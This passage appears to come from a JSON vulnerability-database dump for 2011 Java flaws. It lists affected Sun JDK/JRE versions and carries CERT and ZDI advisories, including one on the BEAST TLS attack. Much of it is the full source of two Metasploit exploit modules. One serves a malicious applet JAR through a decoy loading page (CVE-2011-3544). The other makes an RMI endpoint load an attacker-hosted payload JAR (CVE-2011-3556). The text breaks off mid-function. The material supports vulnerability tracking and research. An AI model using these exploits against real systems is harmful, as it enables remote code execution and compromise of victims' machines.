(Linux Production Release) 1.4.2_19\r\n Sun JRE (Linux Production Release) 1.4.2_18\r\n Sun JRE (Linux Production Release) 1.4.2_17\r\n Sun JRE (Linux Production Release) 1.4.2_16\r\n Sun JRE (Linux Production Release) 1.4.2_15\r\n Sun JRE (Linux Production Release) 1.4.2_14\r\n Sun JRE (Linux Production Release) 1.4.2_13\r\n Sun JRE (Linux Production Release) 1.4.2_12\r\n Sun JRE (Linux Production Release) 1.4.2_11\r\n Sun JDK (Windows Production Release) 1.6 _17\r\n Sun JDK (Windows Production Release) 1.6 _14\r\n Sun JDK (Windows Production Release) 1.6 _13\r\n Sun JDK (Windows Production Release) 1.6 _11\r\n Sun JDK (Windows Production Release) 1.6 _10\r\n Sun JDK (Windows Production Release) 1.6 _07\r\n Sun JDK (Windows Production Release) 1.6 _06\r\n Sun JDK (Windows Production Release) 1.6 _05\r\n Sun JDK (Windows Production Release) 1.6 _04\r\n Sun JDK (Windows Production Release) 1.6\r\n Sun JDK (Windows Production Release) 1.5 0_10\r\n Sun JDK (Windows Production Release) 1.5 _22\r\n Sun JDK (Windows Production Release) 1.5 _18\r\n Sun JDK (Windows Production Release) 1.5 _17\r\n Sun JDK (Windows Production Release) 1.5 _15\r\n Sun JDK (Windows Production Release) 1.5 _14\r\n Sun JDK (Windows Production Release) 1.5 _02\r\n Sun JDK (Windows Production Release) 1.5 _01\r\n Sun JDK (Windows Production Release) 1.5 .0_05\r\n Sun JDK (Windows Production Release) 1.5 .0_04\r\n Sun JDK (Windows Production Release) 1.5 .0_03\r\n Sun JDK (Windows Production Release) 1.6.0_27\r\n Sun JDK (Windows Production Release) 1.6.0_26\r\n Sun JDK (Windows Production Release) 1.6.0_25\r\n Sun JDK (Windows Production Release) 1.6.0_24\r\n Sun JDK (Windows Production Release) 1.6.0_23\r\n Sun JDK (Windows Production Release) 1.6.0_22\r\n Sun JDK (Windows Production Release) 1.6.0_21\r\n Sun JDK (Windows Production Release) 1.6.0_20\r\n Sun JDK (Windows Production Release) 1.6.0_19\r\n Sun JDK (Windows Production Release) 1.6.0_18\r\n Sun JDK (Windows Production Release) 1.6.0_15\r\n Sun JDK (Windows Production Release) 1.6.0_03\r\n Sun JDK (Windows Production Release) 1.6.0_02\r\n Sun JDK (Windows Production Release) 1.6.0_01-b06\r\n Sun JDK (Windows Production Release) 1.6.0_01\r\n Sun JDK (Windows Production Release) 1.5.0_31\r\n Sun JDK (Windows Production Release) 1.5.0_30\r\n Sun JDK (Windows Production Release) 1.5.0_29\r\n Sun JDK (Windows Production Release) 1.5.0_28\r\n Sun JDK (Windows Production Release) 1.5.0_27\r\n Sun JDK (Windows Production Release) 1.5.0_26\r\n Sun JDK (Windows Production Release) 1.5.0_25\r\n Sun JDK (Windows Production Release) 1.5.0_24\r\n Sun JDK (Windows Production Release) 1.5.0_23\r\n Sun JDK (Windows Production Release) 1.5.0_20\r\n Sun JDK (Windows Production Release) 1.5.0_16\r\n Sun JDK (Windows Production Release) 1.5.0_13\r\n Sun JDK (Windows Production Release) 1.5.0_12\r\n Sun JDK (Windows Production Release) 1.5.0_11-b03\r\n Sun JDK (Windows Production Release) 1.5.0_07-b03\r\n Sun JDK (Windows Production Release) 1.5.0.0_12\r\n Sun JDK (Windows Production Release) 1.5.0.0_11\r\n Sun JDK (Windows Production Release) 1.5.0.0_09\r\n Sun JDK (Windows Production Release) 1.5.0.0_08\r\n Sun JDK (Windows Production Release) 1.5.0.0_06\r\n Sun JDK (Solaris Production Release) 1.6 _17\r\n Sun JDK (Solaris Production Release) 1.6 _14\r\n Sun JDK (Solaris Production Release) 1.6 _13\r\n Sun JDK (Solaris Production Release) 1.6 _11\r\n Sun JDK (Solaris Production Release) 1.6 _10\r\n Sun JDK (Solaris Production Release) 1.6 _07\r\n Sun JDK (Solaris Production Release) 1.6 _06\r\n Sun JDK (Solaris Production Release) 1.6 _05\r\n Sun JDK (Solaris Production Release) 1.6 _04\r\n Sun JDK (Solaris Production Release) 1.6 _01-b06\r\n Sun JDK (Solaris Production Release) 1.6\r\n Sun JDK (Solaris Production Release) 1.5 0_10\r\n Sun JDK (Solaris Production Release) 1.5 0_09\r\n Sun JDK (Solaris Production Release) 1.5 0_03\r\n Sun JDK (Solaris Production Release) 1.5 _22\r\n Sun JDK (Solaris Production Release) 1.5 _18\r\n Sun JDK (Solaris Production Release) 1.5 _17\r\n Sun JDK (Solaris Production Release) 1.5 _15\r\n Sun JDK (Solaris Production Release) 1.5 _14\r\n Sun JDK (Solaris Production Release) 1.5 _11-b03\r\n Sun JDK (Solaris Production Release) 1.5 _07-b03\r\n Sun JDK (Solaris Production Release) 1.5 _06\r\n Sun JDK (Solaris Production Release) 1.5 _02\r\n Sun JDK (Solaris Production Release) 1.5 _01\r\n Sun JDK (Solaris Production Release) 1.5 .0_05\r\n Sun JDK (Solaris Production Release) 1.5 .0_04\r\n Sun JDK (Solaris Production Release) 1.5 .0_03\r\n Sun JDK (Solaris Production Release) 1.6.0_27\r\n Sun JDK (Solaris Production Release) 1.6.0_26\r\n Sun JDK (Solaris Production Release) 1.6.0_25\r\n Sun JDK (Solaris Production Release) 1.6.0_24\r\n Sun JDK (Solaris Production Release) 1.6.0_23\r\n Sun JDK (Solaris Production Release) 1.6.0_22\r\n Sun JDK (Solaris Production Release) 1.6.0_21\r\n Sun JDK (Solaris Production Release) 1.6.0_20\r\n Sun JDK (Solaris Production Release) 1.6.0_19\r\n Sun JDK (Solaris Production Release) 1.6.0_18\r\n Sun JDK (Solaris Production Release) 1.6.0_15\r\n Sun JDK (Solaris Production Release) 1.6.0_03\r\n Sun JDK (Solaris Production Release) 1.6.0_02\r\n Sun JDK (Solaris Production Release) 1.6.0_01\r\n Sun JDK (Solaris Production Release) 1.5.0_31\r\n Sun JDK (Solaris Production Release) 1.5.0_30\r\n Sun JDK (Solaris Production Release) 1.5.0_29\r\n Sun JDK (Solaris Production Release) 1.5.0_28\r\n Sun JDK (Solaris Production Release) 1.5.0_27\r\n Sun JDK (Solaris Production Release) 1.5.0_26\r\n Sun JDK (Solaris Production Release) 1.5.0_25\r\n Sun JDK (Solaris Production Release) 1.5.0_24\r\n Sun JDK (Solaris Production Release) 1.5.0_23\r\n Sun JDK (Solaris Production Release) 1.5.0_20\r\n Sun JDK (Solaris Production Release) 1.5.0_16\r\n Sun JDK (Solaris Production Release) 1.5.0_13\r\n Sun JDK (Solaris Production Release) 1.5.0_12\r\n Sun JDK (Solaris Production Release) 1.5.0_11\r\n Sun JDK (Linux Production Release) 1.6 _17\r\n Sun JDK (Linux Production Release) 1.6 _14\r\n Sun JDK (Linux Production Release) 1.6 _13\r\n Sun JDK (Linux Production Release) 1.6 _11\r\n Sun JDK (Linux Production Release) 1.6 _10\r\n Sun JDK (Linux Production Release) 1.6 _07\r\n Sun JDK (Linux Production Release) 1.6 _06\r\n Sun JDK (Linux Production Release) 1.6 _05\r\n Sun JDK (Linux Production Release) 1.6 _04\r\n Sun JDK (Linux Production Release) 1.6 _01-b06\r\n Sun JDK (Linux Production Release) 1.6 _01\r\n Sun JDK (Linux Production Release) 1.6\r\n Sun JDK (Linux Production Release) 1.5 0_10\r\n Sun JDK (Linux Production Release) 1.5 _22\r\n Sun JDK (Linux Production Release) 1.5 _18\r\n Sun JDK (Linux Production Release) 1.5 _17\r\n Sun JDK (Linux Production Release) 1.5 _15\r\n Sun JDK (Linux Production Release) 1.5 _14\r\n Sun JDK (Linux Production Release) 1.5 _11-b03\r\n Sun JDK (Linux Production Release) 1.5 _07-b03\r\n Sun JDK (Linux Production Release) 1.5 _07\r\n Sun JDK (Linux Production Release) 1.5 _06\r\n Sun JDK (Linux Production Release) 1.5 _02\r\n Sun JDK (Linux Production Release) 1.5 _01\r\n Sun JDK (Linux Production Release) 1.5 .0_05\r\n Sun JDK (Linux Production Release) 1.5\r\n Sun JDK (Linux Production Release) 1.6.0_27\r\n Sun JDK (Linux Production Release) 1.6.0_26\r\n Sun JDK (Linux Production Release) 1.6.0_25\r\n Sun JDK (Linux Production Release) 1.6.0_24\r\n Sun JDK (Linux Production Release) 1.6.0_23\r\n Sun JDK (Linux Production Release) 1.6.0_22\r\n Sun JDK (Linux Production Release) 1.6.0_21\r\n Sun JDK (Linux Production Release) 1.6.0_20\r\n Sun JDK (Linux Production Release) 1.6.0_19\r\n Sun JDK (Linux Production Release) 1.6.0_18\r\n Sun JDK (Linux Production Release) 1.6.0_15\r\n Sun JDK (Linux Production Release) 1.6.0_03\r\n Sun JDK (Linux Production Release) 1.6.0_02\r\n Sun JDK (Linux Production Release) 1.5.0_31\r\n Sun JDK (Linux Production Release) 1.5.0_30\r\n Sun JDK (Linux Production Release) 1.5.0_29\r\n Sun JDK (Linux Production Release) 1.5.0_28\r\n Sun JDK (Linux Production Release) 1.5.0_27\r\n Sun JDK (Linux Production Release) 1.5.0_26\r\n Sun JDK (Linux Production Release) 1.5.0_25\r\n Sun JDK (Linux Production Release) 1.5.0_24\r\n Sun JDK (Linux Production Release) 1.5.0_23\r\n Sun JDK (Linux Production Release) 1.5.0_20\r\n Sun JDK (Linux Production Release) 1.5.0_16\r\n Sun JDK (Linux Production Release) 1.5.0_13\r\n Sun JDK (Linux Production Release) 1.5.0.0_12\r\n Sun JDK (Linux Production Release) 1.5.0.0_11\r\n Sun JDK (Linux Production Release) 1.5.0.0_09\r\n Sun JDK (Linux Production Release) 1.5.0.0_08\r\n Sun JDK (Linux Production Release) 1.5.0.0_04\r\n Sun JDK (Linux Production Release) 1.5.0.0_03\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "reporter": "Root", "published": "2011-12-01T00:00:00", "type": "seebug", "title": "Oracle Java Applet Rhino\u811a\u672c\u5f15\u64ce\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24273", "id": "SSV:24273", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize( info = {} )\r\n super( update_info( info,\r\n 'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the Rhino Script Engine that\r\n can be used by a Java Applet to run arbitrary Java code outside of\r\n the sandbox. The vulnerability affects version 7 and version 6 update\r\n 27 and earlier, and should work on any browser that supports Java\r\n (for example: IE, Firefox, Google Chrome, etc)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Michael Schierl', # Discovery\r\n 'juan vazquez', # metasploit module\r\n 'Edward D. Teach <teach@consortium-of-pwners.net>',\r\n 'sinn3r'\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-3544' ],\r\n [ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ],\r\n [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],\r\n ],\r\n 'Platform' => [ 'java', 'win', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Apple OSX',\r\n {\r\n 'ARCH' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n }\r\n ],\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 18 2011'\r\n ))\r\n end\r\n\r\n\r\n def on_request_uri( cli, request )\r\n if not request.uri.match(/\\.jar$/i)\r\n if not request.uri.match(/\\/$/)\r\n send_redirect(cli, get_resource() + '/', '')\r\n return\r\n end\r\n\r\n print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\r\n return\r\n end\r\n\r\n paths = [\r\n [ "Exploit.class" ]\r\n ]\r\n\r\n p = regenerate_payload(cli)\r\n\r\n jar = p.encoded_jar\r\n paths.each do |path|\r\n 1.upto(path.length - 1) do |idx|\r\n full = path[0,idx].join("/") + "/"\r\n if !(jar.entries.map{|e|e.name}.include?(full))\r\n jar.add_file(full, '')\r\n end\r\n end\r\n fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb")\r\n data = fd.read(fd.stat.size)\r\n jar.add_file(path.join("/"), data)\r\n fd.close\r\n end\r\n\r\n print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )\r\n send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )\r\n\r\n handler( cli )\r\n end\r\n\r\n def generate_html\r\n html = "<html><head><title>Loading, Please Wait...</title></head>"\r\n html += "<body><center>Loading, Please Wait...</center>"\r\n html += "<applet archive=\\"Exploit.jar\\" code=\\"Exploit.class\\" width=\\"1\\" height=\\"1\\">"\r\n html += "</applet></body></html>"\r\n return html\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-24273", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc,details"}], "cert": [{"lastseen": "2018-08-31T02:37:41", "references": ["http://www.openssl.org/~bodo/tls-cbc.txt", "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", "https://blog.torproject.org/blog/tor-and-beast-ssl-attack", "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", "http://src.chromium.org/viewvc/chrome?view=rev&revision=97269", "https://bugzilla.mozilla.org/show_bug.cgi?id=665814", "http://www.ekoparty.org/2011/juliano-rizzo.php", "http://www.phonefactor.com/blog/slaying-beast-mitigating-the-latest-ssltls-vulnerability.php", "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3389", "http://vnhacker.blogspot.com/2011/09/beast.html", "http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf"], "description": "### Overview\n\nA vulnerability in the specification of the SSL 3.0 and TLS 1.0 protocols could allow an attacker to decrypt encrypted traffic.\n\n### Description\n\nThe Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network application protocols such as HTTP, IMAP, POP3, LDAP, SMTP, and others. Several different versions of the SSL and TLS protocols have been standardized and are in widespread use. These protocols support the use of both block-based and stream-based ciphers. \n\nA vulnerability in the way the SSL 3.0 and TLS 1.0 protocols select the initialization vector (IV) when operating in cipher-block chaining (CBC) modes allows an attacker to perform a chosen-plaintext attack on encrypted traffic. This vulnerability has been addressed in the specification for the TLS 1.1 and TLS 1.2 protocols. \n \nWhile this vulnerability exists in the underlying specification of the affected protocols, a practical attack called BEAST has been demonstrated in the context of a web browser and the use of the HTTPS protocol. Because of the software functionality available to an attacker in this environment, it represents the most likely attack vector and the most significant risk for affected users. An effective BEAST attack appears to require a cross-domain vulnerability that allows the attacker to issue specially crafted HTTPS requests. A blog post by Th\u00e1i Duong discusses \"...a way to bypass the same-origin policy (SOP)...\" using a Java applet. \n \n--- \n \n### Impact\n\nAn attacker with the ability to pose as a man-in-the-middle and to generate specially-crafted plaintext input could decrypt the contents of an SSL- or TLS-encrypted session. This could allow the attacker to recover potentially sensitive information (e.g., HTTP authentication cookies). \n \n--- \n \n### Solution\n\nWe are currently unaware of a practical solution to this problem. \n \n--- \n \n**Workarounds** \n \nSome vendors have published specific mitigation advice for the attacks related to this issues. Please see the Vendor Information section of this document for more information. \n \nThe following general workarounds can be effective in mitigating this issue: \n\n\n * Prioritize the use of the RC4 algorithm over block ciphers in server software\nNote that this workaround is not feasible to implement on systems that require [FIPS-140](<http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf>) compliance since RC4 is not a FIPS-approved cryptographic algorithm. \n\n * Enable support for TLS 1.1 and/or TLS 1.2 in the web browser \n * Enable support for TLS 1.1 in server software\nNote that both the web servers and the client web browser must support TLS 1.1 or TLS 1.2 for these workarounds to be effective. The session will fallback to an earlier version of the TLS or SSL protocol in the event that either is incompatible with TLS 1.1 or TLS 1.2. \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nGoogle| | -| 27 Sep 2011 \nMicrosoft Corporation| | -| 27 Sep 2011 \nMozilla| | -| 28 Sep 2011 \nOpera| | -| 08 Dec 2011 \nApple Inc.| | -| 27 Sep 2011 \nGnuTLS| | -| 27 Sep 2011 \nOpenSSL| | -| 27 Sep 2011 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23864643 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.openssl.org/~bodo/tls-cbc.txt>\n * <http://www.imperialviolet.org/2011/09/23/chromeandbeast.html>\n * <http://www.phonefactor.com/blog/slaying-beast-mitigating-the-latest-ssltls-vulnerability.php>\n * <http://vnhacker.blogspot.com/2011/09/beast.html>\n * <https://blog.torproject.org/blog/tor-and-beast-ssl-attack>\n * <http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx>\n * <http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx>\n * [http://src.chromium.org/viewvc/chrome?view=rev&revision;=97269](<http://src.chromium.org/viewvc/chrome?view=rev&revision=97269>)\n * <https://bugzilla.mozilla.org/show_bug.cgi?id=665814>\n * <http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html>\n * <http://www.ekoparty.org/2011/juliano-rizzo.php>\n\n### Credit\n\nThanks to Th\u00e1i Duong working with Matasano and Juliano Rizzo of Netifera for reporting the practical attack against this vulnerability. Wei Dai and Bodo M\u00f6ller identified the underlying flaw in the context of SSL and TLS.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n * CVE IDs: [CVE-2011-3389](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3389>)\n * Date Public: 08 Feb 2002\n * Date First Published: 27 Sep 2011\n * Date Last Updated: 08 Dec 2011\n * Severity Metric: 3.37\n * Document Revision: 36\n\n", "edition": 4, "reporter": "CERT", "published": "2011-09-27T00:00:00", "title": "SSL 3.0 and TLS 1.0 allow chosen plaintext attack in CBC modes", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3389", "CVE-2011-3389"], "modified": "2011-12-08T00:00:00", "id": "VU:864643", "href": "https://www.kb.cert.org/vuls/id/864643", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:54", "references": ["http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the way Java handles IIOP deserialization. Due to insufficient type checking it is possible to trick java into allowing access to otherwise protected and private fields in built-in objects. This could be used, for example, to disable to security manager normally in place for applets. This leads to remote code execution under the context of the current user.", "reporter": "Sami Koivu", "published": "2011-10-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2011-3521"], "modified": "2011-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-306", "id": "ZDI-11-306", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:55", "references": ["http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the way Java handles Rhino Javascript errors. The built-in javascript engine in Java fails to perform sufficient sanitation on javascript error objects. The effect is that untrusted code can run in privileged context. This can result in remote code execution under the context of the current user.", "reporter": "Michael Schierl", "published": "2011-10-26T00:00:00", "title": "Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "modified": "2011-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-305", "id": "ZDI-11-305", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-21T04:00:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.", "reporter": "Rapid7", "published": "2014-11-14T00:00:11", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/misc/java_rmi_server.rb", "type": "metasploit", "title": "Java RMI Server Insecure Default Configuration Java Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3556"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/MISC/JAVA_RMI_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Java::Rmi::Client\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Java RMI Server Insecure Default Configuration Java Code Execution',\n 'Description' => %q{\n This module takes advantage of the default configuration of the RMI Registry and\n RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n invokes a method in the RMI Distributed Garbage Collector which is available via every\n RMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n (custom) RMI endpoints as well.\n\n Note that it does not work against Java Management Extension (JMX) ports since those do\n not support remote class loading, unless another RMI endpoint is active in the same\n Java process.\n\n RMI method calls do not support or require any sort of authentication.\n },\n 'Author' => [ 'mihi' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n # RMI protocol specification\n [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],\n [ 'URL', 'http://www.securitytracker.com/id?1026215'],\n [ 'CVE', '2011-3556']\n ],\n 'DisclosureDate' => 'Oct 15 2011',\n 'Platform' => %w{ java linux osx solaris win },\n 'Privileged' => false,\n 'Payload' => { 'BadChars' => '', 'DisableNops' => true },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10\n },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n register_options([\n Opt::RPORT(1099),\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),\n ])\n register_common_rmi_ports_and_services\n end\n\n def exploit\n begin\n Timeout.timeout(datastore['HTTPDELAY']) { super }\n rescue Timeout::Error\n # When the server stops due to our timeout, re-raise\n # RuntimeError so it won't wait the full wfs_delay\n raise ::RuntimeError, \"Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request\"\n rescue Msf::Exploit::Failed\n # When the server stops due primer failing, re-raise\n # RuntimeError so it won't wait the full wfs_delays\n raise ::RuntimeError, \"Exploit aborted due to failure #{fail_reason} #{(fail_detail || \"No reason given\")}\"\n rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e\n # When the primer fails due to an error connecting with\n # the rhost, re-raise RuntimeError so it won't wait the\n # full wfs_delays\n raise ::RuntimeError, e.message\n end\n end\n\n def primer\n connect\n\n print_status(\"Sending RMI Header...\")\n send_header\n ack = recv_protocol_ack\n if ack.nil?\n fail_with(Failure::NoTarget, \"#{peer} - Failed to negotiate RMI protocol\")\n end\n\n jar = rand_text_alpha(rand(8)+1) + '.jar'\n new_url = get_uri + '/' + jar\n\n print_status(\"Sending RMI Call...\")\n dgc_interface_hash = calculate_interface_hash(\n [\n {\n name: 'clean',\n descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/VMID;Z)V',\n exceptions: ['java.rmi.RemoteException']\n },\n {\n name: 'dirty',\n descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/Lease;)Ljava/rmi/dgc/Lease;',\n exceptions: ['java.rmi.RemoteException']\n }\n ]\n )\n\n # JDK 1.1 stub protocol\n # Interface hash: 0xf6b6898d8bf28643 (sun.rmi.transport.DGCImpl_Stub)\n # Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))\n send_call(\n object_number: 2,\n uid_number: 0,\n uid_time: 0,\n uid_count: 0,\n operation: 0,\n hash: dgc_interface_hash, # java.rmi.dgc.DGC interface hash\n arguments: build_dgc_clean_args(new_url)\n )\n\n return_value = recv_return\n\n if return_value.nil? && !session_created?\n fail_with(Failure::Unknown, 'RMI Call failed')\n end\n\n if return_value && return_value.is_exception? && loader_disabled?(return_value)\n fail_with(Failure::NotVulnerable, 'The RMI class loader is disabled')\n end\n\n if return_value && return_value.is_exception? && class_not_found?(return_value)\n fail_with(Failure::Unknown, 'The RMI class loader couldn\\'t find the payload')\n end\n\n disconnect\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ /\\.jar$/i\n p = regenerate_payload(cli)\n jar = p.encoded_jar\n paths = [\n [ \"metasploit\", \"RMILoader.class\" ],\n [ \"metasploit\", \"RMIPayload.class\" ],\n ]\n jar.add_files(paths, MetasploitPayloads.path('java'))\n\n send_response(cli, jar.pack,\n {\n 'Content-Type' => 'application/java-archive',\n 'Connection' => 'close',\n 'Pragma' => 'no-cache'\n })\n\n print_status(\"Replied to request for payload JAR\")\n stop_service\n end\n end\n\n def cleanup\n # Normally service termination should not be managed on the module's level, but this is a\n # special case.\n #\n # Originally this special service termination routine was implemented in\n # Exploit::Remote::TcpServer#stop_service, but that would actually cause all HttpServers to stop\n # if one of them attempts to register a resource that is already taken, which seems to be a\n # harsh punishment. This is why the fix is moved here.\n #\n # See references:\n # https://github.com/rapid7/metasploit-framework/pull/4203\n # https://github.com/rapid7/metasploit-framework/issues/6445\n service.stop if service\n\n super\n end\n\n def autofilter\n return true\n end\n\n def loader_disabled?(return_value)\n return_value.value.each do |exception|\n if exception.class == Rex::Java::Serialization::Model::NewObject &&\n exception.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&\n exception.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'&&\n [Rex::Java::Serialization::Model::NullReference, Rex::Java::Serialization::Model::Reference].include?(exception.class_data[0].class) &&\n exception.class_data[1].contents.include?('RMI class loader disabled')\n return true\n end\n end\n\n false\n end\n\n def class_not_found?(return_value)\n return_value.value.each do |exception|\n if exception.class == Rex::Java::Serialization::Model::NewObject &&\n exception.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&\n 